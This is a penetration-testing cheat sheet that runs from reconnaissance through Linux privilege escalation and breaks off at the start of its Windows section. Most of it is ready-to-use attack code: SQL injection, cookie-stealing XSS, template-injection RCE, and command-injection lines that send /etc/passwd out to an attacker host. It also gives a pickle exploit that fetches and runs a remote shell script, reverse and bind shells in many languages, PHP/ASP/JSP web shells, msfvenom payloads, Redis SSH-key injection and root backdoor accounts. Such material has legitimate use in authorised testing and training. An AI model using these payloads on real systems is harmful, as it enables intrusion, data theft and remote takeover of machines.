A comprehensive reference for penetration testing methodology, covering reconnaissance through post-exploitation.

1. Reconnaissance
2. Service Enumeration
3. Web Application Attacks
4. Shells & File Transfers
5. Linux Privilege Escalation
6. Windows Privilege Escalation
7. Active Directory Attacks
8. Pivoting & Tunneling
9. Password Cracking
10. Cloud & Container Attacks
11. Modern C2 Frameworks
12. Coercion Techniques

1. Reconnaissance

Nmap Scanning

Quick Scans

bash

# Default script + version scan
nmap -sC -sV -oA nmap/initial $IP
 
# Full port scan (fast)
nmap -p- --min-rate 5000 -oA nmap/allports $IP
 
# Targeted scan on discovered ports
nmap -sC -sV -p 22,80,443,8080 -oA nmap/targeted $IP
 
# UDP top 20
sudo nmap -sU --top-ports 20 -oA nmap/udp $IP

Specialized Scans

bash

# Vulnerability scripts
nmap --script vuln -p 80,443 $IP
 
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 $IP
 
# HTTP enumeration
nmap --script http-enum -p 80,443 $IP
 
# OS detection
sudo nmap -O $IP
 
# Aggressive scan (noisy)
nmap -A $IP

Scan Types

Flag	Type	Use Case
`-sS`	SYN (stealth)	Default, fast, doesn't complete handshake
`-sT`	TCP connect	When you can't do SYN (no root)
`-sU`	UDP	DNS (53), SNMP (161), TFTP (69)
`-sV`	Version	Service fingerprinting
`-sC`	Scripts	Default NSE scripts
`-Pn`	No ping	Host blocks ICMP

Web Reconnaissance

Technology Fingerprinting

bash

# Identify web technologies
whatweb http://$IP
whatweb -a 3 http://$IP    # Aggressive mode
 
# Wappalyzer-style
httpx -u http://$IP -tech-detect
 
# Curl headers
curl -I http://$IP
curl -s http://$IP | head -50

Directory & File Brute-forcing

bash

# Gobuster
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster.txt
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -x php,txt,html,bak,old
 
# Feroxbuster (recursive)
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o ferox.txt
feroxbuster -u http://$IP -x php,aspx,jsp -d 2 -t 50
 
# Dirsearch
dirsearch -u http://$IP -e php,asp,aspx,jsp,html,txt
 
# ffuf
ffuf -u http://$IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o ffuf.json -of json

Subdomain & VHost Enumeration

bash

# Subdomain brute-force
gobuster dns -d target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 
# VHost enumeration
gobuster vhost -u http://$IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
 
# ffuf VHost
ffuf -u http://$IP -H "Host: FUZZ.target.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <default_size>
 
# Certificate transparency
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sort -u

Information Leaks

bash

# Common files to check
curl -s http://$IP/robots.txt
curl -s http://$IP/sitemap.xml
curl -s http://$IP/.env
curl -s http://$IP/.git/HEAD
curl -s http://$IP/wp-config.php.bak
curl -s http://$IP/server-status
curl -s http://$IP/.htaccess
curl -s http://$IP/crossdomain.xml
curl -s http://$IP/clientaccesspolicy.xml
 
# Git dump (if .git exposed)
git-dumper http://$IP/.git/ git-dump/

DNS Enumeration

bash

# Zone transfer
dig axfr @$IP target.com
 
# Any records
dig any target.com @$IP
 
# Specific records
dig A target.com @$IP
dig MX target.com @$IP
dig TXT target.com @$IP
dig NS target.com @$IP
 
# Reverse lookup
dig -x $IP @$IP
 
# DNSrecon
dnsrecon -d target.com -t std
dnsrecon -d target.com -t axfr

SNMP Enumeration

bash

# Community string brute-force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt $IP
 
# Walk with known community string
snmpwalk -v2c -c public $IP
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.2   # Running processes
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.6.3.1.2   # Installed software
snmpwalk -v2c -c public $IP 1.3.6.1.4.1.77.1.2.25     # User accounts
 
# snmp-check
snmp-check $IP -c public

Reconnaissance Checklist

Add hostnames to /etc/hosts
Check for anonymous/default credentials
Check all ports — don't skip high ports
Note versions — search for CVEs
Save all output to files

2. Service Enumeration

SMB (445/139)

bash

# Null session
smbclient -L //$IP/ -N
netexec smb $IP -u '' -p ''
netexec smb $IP -u 'guest' -p ''
 
# List shares
smbmap -H $IP
smbmap -H $IP -u user -p pass
netexec smb $IP -u user -p pass --shares
 
# Access shares
smbclient //$IP/share -U user%pass
smbclient //$IP/share -N
 
# Recursive download
smbclient //$IP/share -U user%pass -c 'recurse ON; prompt OFF; mget *'
smbget -R smb://$IP/share -U user%pass
 
# Enum4linux
enum4linux -a $IP
 
# Check for signing (relay attacks)
netexec smb $IP --gen-relay-list relay.txt

FTP (21)

bash

# Anonymous login
ftp $IP
# user: anonymous, pass: (blank or email)
 
# Check for write access
ftp> put test.txt
 
# Download everything
wget -r ftp://anonymous:@$IP/
 
# Common misconfigs
# - Anonymous login enabled
# - Writable directories
# - FTP root is web root

SSH (22)

bash

# Banner grab
nc -nv $IP 22
 
# Brute force
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP
netexec ssh $IP -u user -P /usr/share/wordlists/rockyou.txt
 
# Key-based login
ssh -i id_rsa user@$IP
chmod 600 id_rsa
 
# Old algorithms
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss user@$IP

HTTP/HTTPS (80/443/8080)

bash

# Fingerprint
whatweb http://$IP
curl -I http://$IP
 
# Directory brute-force
gobuster dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,txt
feroxbuster -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 
# VHost enumeration
gobuster vhost -u http://$IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
ffuf -u http://$IP -H "Host: FUZZ.target.com" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs SIZE
 
# API fuzzing
gobuster dir -u http://$IP/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
ffuf -u http://$IP/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
 
# Parameter fuzzing
ffuf -u "http://$IP/page?FUZZ=test" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fs SIZE
 
# Nikto
nikto -h http://$IP
 
# Check common files
curl http://$IP/robots.txt
curl http://$IP/.env
curl http://$IP/.git/HEAD
curl http://$IP/sitemap.xml
curl http://$IP/server-status
curl http://$IP/server-info

DNS (53)

bash

# Zone transfer
dig axfr @$IP target.com
 
# Record queries
dig any target.com @$IP
dig A target.com @$IP
dig MX target.com @$IP
dig TXT target.com @$IP
dig NS target.com @$IP
 
# Reverse lookup
dig -x $IP @$IP
 
# Brute-force subdomains
dnsenum target.com --dnsserver $IP
dnsrecon -d target.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

LDAP (389/636)

bash

# Anonymous bind
ldapsearch -x -H ldap://$IP -b "" -s base namingContexts
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com"
 
# Authenticated
ldapsearch -x -H ldap://$IP -D "user@domain.com" -w 'password' -b "DC=domain,DC=com"
 
# Find users
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=user)" sAMAccountName
 
# Find computers
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "(objectClass=computer)" cn
 
# Dump everything
ldapsearch -x -H ldap://$IP -b "DC=domain,DC=com" "*"

Kerberos (88)

bash

# User enumeration
kerbrute userenum -d domain.com --dc $IP usernames.txt
 
# AS-REP Roast
GetNPUsers.py domain.com/ -usersfile users.txt -no-pass -dc-ip $IP
 
# Kerberoast
GetUserSPNs.py domain.com/user:pass -dc-ip $IP -request

MSSQL (1433)

bash

# Connect
mssqlclient.py user:pass@$IP
mssqlclient.py user:pass@$IP -windows-auth
 
# Enable xp_cmdshell
enable_xp_cmdshell
xp_cmdshell whoami
 
# Enumerate
SELECT name FROM master..sysdatabases;
SELECT * FROM <db>.information_schema.tables;
SELECT * FROM <db>.dbo.<table>;
 
# NetExec
netexec mssql $IP -u user -p pass -x 'whoami'
netexec mssql $IP -u user -p pass -q 'SELECT name FROM master..sysdatabases'

MySQL (3306)

bash

# Connect
mysql -h $IP -u root -p
mysql -h $IP -u root
 
# Enumerate
SHOW databases;
USE <db>;
SHOW tables;
SELECT * FROM <table>;
 
# Read files (if FILE privilege)
SELECT LOAD_FILE('/etc/passwd');
 
# Write files (if FILE privilege + secure_file_priv allows)
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
 
# UDF for command execution
# Check: SELECT @@plugin_dir;

Redis (6379)

bash

# Connect (usually no auth)
redis-cli -h $IP
 
# Enumerate
INFO
CONFIG GET *
KEYS *
GET <key>
 
# Write webshell
CONFIG SET dir /var/www/html/
CONFIG SET dbfilename shell.php
SET payload '<?php system($_GET["cmd"]); ?>'
SAVE
 
# SSH key injection
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET payload "\n\nssh-ed25519 AAAA... user@attacker\n\n"
SAVE

NFS (2049)

bash

# List exports
showmount -e $IP
 
# Mount
mkdir /tmp/nfs
mount -t nfs $IP:/share /tmp/nfs -o nolock
 
# Check for no_root_squash (privesc)
cat /etc/exports  # on target

SNMP (161/UDP)

bash

# Community string brute-force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt $IP
 
# Walk
snmpwalk -v2c -c public $IP
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.4.2.1.2    # processes
snmpwalk -v2c -c public $IP 1.3.6.1.2.1.25.6.3.1.2    # software
snmpwalk -v2c -c public $IP 1.3.6.1.4.1.77.1.2.25      # users
 
# snmp-check
snmp-check $IP -c public

RPC (135/111)

bash

# Windows RPC
rpcclient -U "" -N $IP
rpcclient -U "user%pass" $IP
> enumdomusers
> enumdomgroups
> queryuser 0x1f4
> querydispinfo
> netshareenumall
 
# Linux RPC
rpcinfo -p $IP

WinRM (5985/5986)

bash

# Test access
netexec winrm $IP -u user -p pass
 
# Connect
evil-winrm -i $IP -u user -p 'password'
evil-winrm -i $IP -u user -H NTHASH

Tomcat (8080/8443)

bash

# Default creds: tomcat:tomcat, admin:admin, tomcat:s3cret
# Manager: /manager/html
# Host Manager: /host-manager/html
 
# Deploy WAR shell
msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=PORT -f war -o shell.war
curl --upload-file shell.war "http://user:pass@$IP:8080/manager/text/deploy?path=/shell"
curl http://$IP:8080/shell/

WordPress

bash

# Enumerate
wpscan --url http://$IP --enumerate u,p,t
wpscan --url http://$IP --enumerate u,ap,at --plugins-detection aggressive
 
# Brute force
wpscan --url http://$IP -U admin -P /usr/share/wordlists/rockyou.txt
 
# Key files
/wp-config.php
/wp-login.php
/wp-admin/
/xmlrpc.php
/wp-content/uploads/
/wp-content/plugins/

3. Web Application Attacks

SQL Injection

Detection

plaintext

' OR 1=1-- -
" OR 1=1-- -
' OR '1'='1
admin'--
1' ORDER BY 1-- -
1' UNION SELECT NULL-- -

Union-Based SQLi

sql

-- Find column count
' ORDER BY 1-- -
' ORDER BY 2-- -
' ORDER BY 3-- -
 
-- Find injectable columns
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 'a',NULL,NULL-- -
 
-- Extract data
' UNION SELECT username,password,NULL FROM users-- -
 
-- MySQL version & DB
' UNION SELECT version(),database(),NULL-- -
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables WHERE table_schema=database()-- -
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'-- -

sql

-- Boolean-based
' AND 1=1-- -    (true)
' AND 1=2-- -    (false)
' AND SUBSTRING(username,1,1)='a' FROM users-- -
 
-- Time-based
' AND SLEEP(5)-- -
' AND IF(1=1,SLEEP(5),0)-- -
'; WAITFOR DELAY '0:0:5'-- -

SQLMap

bash

# Basic
sqlmap -u "http://$IP/page?id=1" --batch
 
# POST request
sqlmap -u "http://$IP/login" --data="user=admin&pass=test" --batch
 
# With cookie/header
sqlmap -u "http://$IP/page?id=1" --cookie="session=abc123" --batch
 
# Dump database
sqlmap -u "http://$IP/page?id=1" --dbs
sqlmap -u "http://$IP/page?id=1" -D dbname --tables
sqlmap -u "http://$IP/page?id=1" -D dbname -T users --dump
 
# OS shell
sqlmap -u "http://$IP/page?id=1" --os-shell

Cross-Site Scripting (XSS)

Payloads

html

<!-- Basic -->
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
 
<!-- Attribute injection -->
" onmouseover="alert(1)
' onfocus='alert(1)' autofocus='
 
<!-- Filter bypass -->
<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror=alert(String.fromCharCode(88,83,83))>
<svg/onload=alert(1)>
javascript:alert(1)
 
<!-- Cookie steal -->
<script>document.location='http://LHOST/?c='+document.cookie</script>
<img src=x onerror="fetch('http://LHOST/?c='+document.cookie)">

Server-Side Template Injection (SSTI)

Detection

plaintext

{{7*7}}         → 49 (Jinja2/Twig)
${7*7}          → 49 (FreeMarker/Mako)
#{7*7}          → 49 (Thymeleaf/Ruby ERB)
<%= 7*7 %>      → 49 (ERB)

Exploitation

python

# Jinja2 (Python)
{{config}}
{{config.items()}}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()}}
 
# Jinja2 RCE
{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}

ruby

# ERB (Ruby)
<%= system("id") %>
<%= `id` %>

Command Injection

Operators

bash

; id                    # Sequential
| id                    # Pipe
|| id                   # OR (runs if first fails)
&& id                   # AND (runs if first succeeds)
$(id)                   # Command substitution
`id`                    # Backtick substitution
%0aid                   # Newline (URL encoded)

bash

# Time-based
; sleep 5
| sleep 5
& ping -c 5 127.0.0.1 &
 
# Out-of-band
; curl http://LHOST/$(whoami)
; nslookup $(whoami).LHOST
; wget http://LHOST/$(cat /etc/passwd | base64)

File Inclusion

Local File Inclusion (LFI)

plaintext

# Basic
?page=../../../../etc/passwd
?page=....//....//....//etc/passwd
 
# Null byte (PHP < 5.3)
?page=../../../../etc/passwd%00
 
# PHP wrappers
?page=php://filter/convert.base64-encode/resource=index.php
?page=php://input  (POST: <?php system('id'); ?>)
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=id
?page=expect://id
 
# Log poisoning
?page=/var/log/apache2/access.log
# Then send request with User-Agent: <?php system($_GET['cmd']); ?>

Remote File Inclusion (RFI)

plaintext

?page=http://LHOST/shell.php
?page=http://LHOST/shell.txt

File Upload

Bypass Techniques

plaintext

# Extension bypass
.php → .php5, .phtml, .phar, .phps, .pHP
.asp → .aspx, .ashx, .asmx, .asp;.jpg
.jsp → .jspx, .jsw, .jsv
 
# Content-Type bypass
Change Content-Type to: image/png, image/jpeg, image/gif
 
# Magic bytes
GIF89a;<?php system($_GET['cmd']); ?>
Add PNG header: \x89PNG\r\n\x1a\n before PHP code
 
# Double extension
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
 
# .htaccess upload
AddType application/x-httpd-php .jpg

Deserialization

PHP

php

# Look for unserialize() with user input
O:4:"User":2:{s:4:"name";s:5:"admin";s:6:"isAdmin";b:1;}

Python (Pickle)

python

import pickle, os, base64
 
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl http://LHOST/shell.sh | bash',))
 
print(base64.b64encode(pickle.dumps(Exploit())).decode())

Java

bash

# ysoserial
java -jar ysoserial.jar CommonsCollections1 'ping LHOST' | base64

XXE (XML External Entity)

xml

<!-- Read file -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
 
<!-- SSRF -->
<!ENTITY xxe SYSTEM "http://internal-server/admin">
 
<!-- Blind XXE (out-of-band) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://LHOST/evil.dtd">
%dtd;

SSRF (Server-Side Request Forgery)

plaintext

# Localhost access
http://127.0.0.1/admin
http://localhost/admin
http://0.0.0.0/admin
http://[::1]/admin
http://0x7f000001/admin
http://2130706433/admin
 
# Cloud metadata
http://169.254.169.254/latest/meta-data/    (AWS)
http://metadata.google.internal/             (GCP)
http://169.254.169.254/metadata/instance     (Azure)
 
# Internal port scanning
http://127.0.0.1:PORT/

JWT Attacks

bash

# None algorithm — change header to {"alg": "none"}, empty signature
# Key confusion — RS256 → HS256, sign with public key as HMAC secret
python3 jwt_tool.py <token> -X k -pk public.pem
 
# JKU/X5U injection — host your own JWKS
python3 jwt_tool.py <token> -X s -ju http://ATTACKER/jwks.json
 
# KID injection (path traversal)
# Header: {"kid": "../../dev/null", "alg": "HS256"} → sign with empty string
 
# Comprehensive testing
python3 jwt_tool.py <token> -M at                    # All tests
python3 jwt_tool.py <token> -C -d wordlist.txt       # Crack secret
python3 jwt_tool.py <token> -I -pc name -pv admin    # Inject claim

OAuth/OIDC Attacks

bash

# Open redirect → token theft
# Manipulate redirect_uri:
https://auth.target.com/authorize?client_id=X&redirect_uri=https://evil.com&response_type=token
 
# Authorization code injection — intercept and replay against different client
# Device code flow phishing — generate device code, phish user to enter at login page
# SSRF via OAuth callbacks — register app with callback to internal services
# Scope escalation — request broader scopes than intended

HTTP Request Smuggling

plaintext

# CL.TE (front-end: Content-Length, back-end: Transfer-Encoding)
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked
 
0
 
SMUGGLED
 
# TE.CL
POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked
 
8
SMUGGLED
0
 
# Tools: Burp HTTP Request Smuggler extension, smuggler.py

Prototype Pollution

javascript

// Server-side JavaScript
{"__proto__": {"isAdmin": true}}
{"constructor": {"prototype": {"isAdmin": true}}}
 
// Via JSON merge in API:
POST /api/user HTTP/1.1
Content-Type: application/json
{"__proto__": {"shell": "/proc/self/exe", "NODE_OPTIONS": "--require /proc/self/environ"}}

4. Shells & File Transfers

Reverse Shells

Bash

bash

bash -i >& /dev/tcp/LHOST/PORT 0>&1
bash -c 'bash -i >& /dev/tcp/LHOST/PORT 0>&1'

Python

bash

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

PHP

bash

php -r '$sock=fsockopen("LHOST",PORT);exec("/bin/bash -i <&3 >&3 2>&3");'

Perl

bash

perl -e 'use Socket;$i="LHOST";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'

Ruby

bash

ruby -rsocket -e'f=TCPSocket.open("LHOST",PORT).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

bash

nc -e /bin/bash LHOST PORT
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc LHOST PORT >/tmp/f

PowerShell

powershell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('LHOST',PORT);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()};$client.Close()"

Listeners

bash

# Netcat
rlwrap nc -lvnp PORT
 
# Socat
socat TCP-LISTEN:PORT,reuseaddr FILE:`tty`,raw,echo=0
 
# Pwncat (auto-upgrade)
pwncat-cs -lp PORT

Shell Upgrade

bash

# Step 1: Spawn PTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
# or
script /dev/null -c bash
# or
/usr/bin/script -qc /bin/bash /dev/null
 
# Step 2: Background it
Ctrl+Z
 
# Step 3: Fix terminal
stty raw -echo; fg
 
# Step 4: Set environment
export TERM=xterm-256color
export SHELL=/bin/bash
stty rows 40 cols 160

Bind Shells

bash

# Target (listening)
nc -lvnp PORT -e /bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp PORT >/tmp/f
 
# Attacker (connecting)
nc $IP PORT

Web Shells

PHP

php

<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

ASP/ASPX

asp

<%response.write CreateObject("WScript.Shell").Exec(Request("cmd")).StdOut.ReadAll()%>

JSP

jsp

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

Payloads with msfvenom

bash

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o shell.elf
 
# Windows reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
 
# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o shell.dll
 
# MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o shell.msi
 
# PHP
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw > shell.php
 
# WAR (Tomcat)
msfvenom -p java/shell_reverse_tcp LHOST=IP LPORT=PORT -f war -o shell.war
 
# ASP
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f asp > shell.asp
 
# Python
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw

File Transfer Methods

Linux to Linux

bash

# Python HTTP server (attacker)
python3 -m http.server 8000
 
# Download on target
wget http://LHOST:8000/file
curl http://LHOST:8000/file -o file

Linux to Windows

powershell

# PowerShell download
Invoke-WebRequest http://LHOST:8000/file -OutFile C:\temp\file
iwr http://LHOST:8000/file -OutFile C:\temp\file
(New-Object Net.WebClient).DownloadFile('http://LHOST:8000/file','C:\temp\file')
 
# Certutil
certutil -urlcache -f http://LHOST:8000/file C:\temp\file
 
# Bitsadmin
bitsadmin /transfer job /download /priority high http://LHOST:8000/file C:\temp\file

SMB Server

bash

# Start server (attacker)
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -user user -password pass
 
# Access from Windows
copy \\LHOST\share\file C:\temp\file
net use Z: \\LHOST\share /user:user pass

SCP / SSH

bash

# Upload to target
scp file user@$IP:/tmp/file
 
# Download from target
scp user@$IP:/tmp/file ./file

Netcat Transfer

bash

# Receiver
nc -lvnp 9001 > file
 
# Sender
nc RECEIVER_IP 9001 < file

Base64 (small files)

bash

# Encode
base64 -w0 file > file.b64
cat file.b64
 
# Decode on target
echo "BASE64_STRING" | base64 -d > file

5. Linux Privilege Escalation

Automated Enumeration

bash

# LinPEAS (always run first)
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
# or transfer and run
./linpeas.sh | tee linpeas.txt
 
# LinEnum
./LinEnum.sh -t
 
# linux-exploit-suggester
./linux-exploit-suggester.sh

Manual Enumeration

bash

# System info
uname -a
cat /etc/os-release
cat /proc/version
hostname
 
# Current user
id
whoami
groups
 
# All users
cat /etc/passwd | grep -v nologin
cat /etc/shadow  # if readable
 
# Network
ip a
ss -tlnp        # listening services (check localhost-only!)
netstat -tlnp
cat /etc/hosts
route -n
arp -a
 
# Running processes
ps auxww
ps -ef
 
# Installed software
dpkg -l
rpm -qa

sudo

bash

# Check sudo permissions
sudo -l
 
# Common wins
sudo vim -c '!sh'
sudo awk 'BEGIN {system("/bin/bash")}'
sudo find / -exec /bin/bash \; -quit
sudo python3 -c 'import os; os.system("/bin/bash")'
sudo env /bin/bash
sudo less /etc/shadow   # then !sh
sudo nmap --interactive  # then !sh (old nmap)
 
# LD_PRELOAD (if env_keep+=LD_PRELOAD in sudo -l)
# Compile: gcc -fPIC -shared -o /tmp/pe.so pe.c -nostartfiles
# pe.c:
#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0); setuid(0);
    system("/bin/bash -p");
}
# Run: sudo LD_PRELOAD=/tmp/pe.so <allowed_command>
 
# Check GTFOBins for any sudo binary
# https://gtfobins.github.io/

SUID / SGID Binaries

bash

# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
 
# Find SGID binaries
find / -perm -2000 -type f 2>/dev/null
 
# Common SUID exploits
# Check each against GTFOBins
 
# Custom SUID binary — check with strings/ltrace/strace
strings /path/to/suid-binary
ltrace /path/to/suid-binary
strace /path/to/suid-binary
 
# Path hijacking (if SUID binary calls commands without full path)
echo '/bin/bash -p' > /tmp/curl
chmod +x /tmp/curl
export PATH=/tmp:$PATH
/path/to/suid-binary
 
# Shared library hijacking
strace /path/to/suid-binary 2>&1 | grep "No such file"
# Compile malicious .so for missing library

Cron Jobs

bash

# Check cron
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
 
# Check for writable cron scripts
ls -la /path/to/cron/script.sh
 
# Wildcard injection (if cron runs tar with *)
echo "" > "--checkpoint=1"
echo "" > "--checkpoint-action=exec=sh shell.sh"
 
# PATH abuse (if cron uses relative path)
echo '#!/bin/bash\nbash -i >& /dev/tcp/LHOST/4444 0>&1' > /path/command
chmod +x /path/command
 
# Monitor for cron with pspy
./pspy64

Capabilities

bash

# Find binaries with capabilities
getcap -r / 2>/dev/null
 
# Common capability exploits
# cap_setuid+ep on python3
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
 
# cap_setuid+ep on perl
perl -e 'use POSIX; POSIX::setuid(0); exec "/bin/bash";'
 
# cap_net_raw+ep — can sniff traffic
# cap_dac_read_search — can read any file
# cap_net_bind_service — can bind to privileged ports

Writable Files & Directories

bash

# Writable /etc/passwd
echo 'root2:$(openssl passwd -1 password):0:0:root:/root:/bin/bash' >> /etc/passwd
su root2  # password: password
 
# Writable /etc/shadow
mkpasswd -m sha-512 newpassword
# Replace root's hash in /etc/shadow
 
# Writable scripts run by root
find / -writable -type f 2>/dev/null | grep -v proc
 
# World-writable directories
find / -writable -type d 2>/dev/null

Kernel Exploits

bash

# Check kernel version
uname -r
cat /etc/os-release
 
# Use linux-exploit-suggester for matches
./linux-exploit-suggester.sh

Recent CVEs

bash

# CVE-2024-1086 — nf_tables UAF (kernels 5.14-6.6, 99.4% success rate)
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086 && make && ./exploit
 
# CVE-2023-2640 + CVE-2023-32629 — GameOver(lay) (Ubuntu OverlayFS)
git clone https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
./exploit.sh
 
# CVE-2023-32233 — nf_tables UAF (kernels <= 6.3.1)
git clone https://github.com/Liuk3r/CVE-2023-32233
cd CVE-2023-32233 && make && ./exploit
 
# CVE-2023-4911 — Looney Tunables (glibc GLIBC_TUNABLES buffer overflow)
# Affects most glibc-based distros
 
# CVE-2022-0847 — DirtyPipe (kernels 5.8-5.16.11)
# Overwrites read-only files
 
# CVE-2021-4034 — PwnKit (pkexec, almost universal)
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit && ./PwnKit
 
# CVE-2016-5195 — DirtyCow (kernels 2.6.22-4.8.3)

Docker / LXD Group

bash

# Docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 
# LXD group
lxc init ubuntu:18.04 privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/bash

NFS

bash

# Check for no_root_squash
cat /etc/exports
showmount -e $IP
 
# Exploit (from attacker machine)
mkdir /tmp/nfs
mount -t nfs $IP:/share /tmp/nfs
cp /bin/bash /tmp/nfs/
chmod +s /tmp/nfs/bash
# On target: /share/bash -p

Internal Services

bash

# Check localhost-only services
ss -tlnp
netstat -tlnp
 
# Port forward to access
ssh -L 8080:127.0.0.1:8080 user@$IP
# or with chisel
./chisel client LHOST:9001 R:8080:127.0.0.1:8080

Credential Hunting

bash

# Config files
find / -name "*.conf" -o -name "*.config" -o -name "*.cfg" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
find / -name "*.php" -o -name "*.py" -o -name "*.js" 2>/dev/null | xargs grep -il "password\|passwd\|db_pass" 2>/dev/null
 
# History files
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
 
# SSH keys
find / -name "id_rsa" -o -name "id_ed25519" -o -name "authorized_keys" 2>/dev/null
 
# Environment variables
env
cat /proc/*/environ 2>/dev/null
 
# Database credentials
cat /var/www/html/wp-config.php
cat /var/www/html/.env
cat /etc/mysql/debian.cnf
 
# Always try password reuse across users!
su - <other_user>

Linux Privesc Checklist

sudo -l
SUID binaries
Cron jobs
Capabilities
Kernel CVEs
Docker/LXD group
Writable /etc/passwd
Internal services (ss -tlnp)
NFS no_root_squash
Credential hunting

6. Windows Privilege Escalation

Automated Enumeration

powershell

# WinPEAS (always run first)
.\winPEASx64.exe
 
# PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks
 
# SharpUp
.\SharpUp.exe audit
 
# Seatbelt
.\Seatbelt.exe -group=all

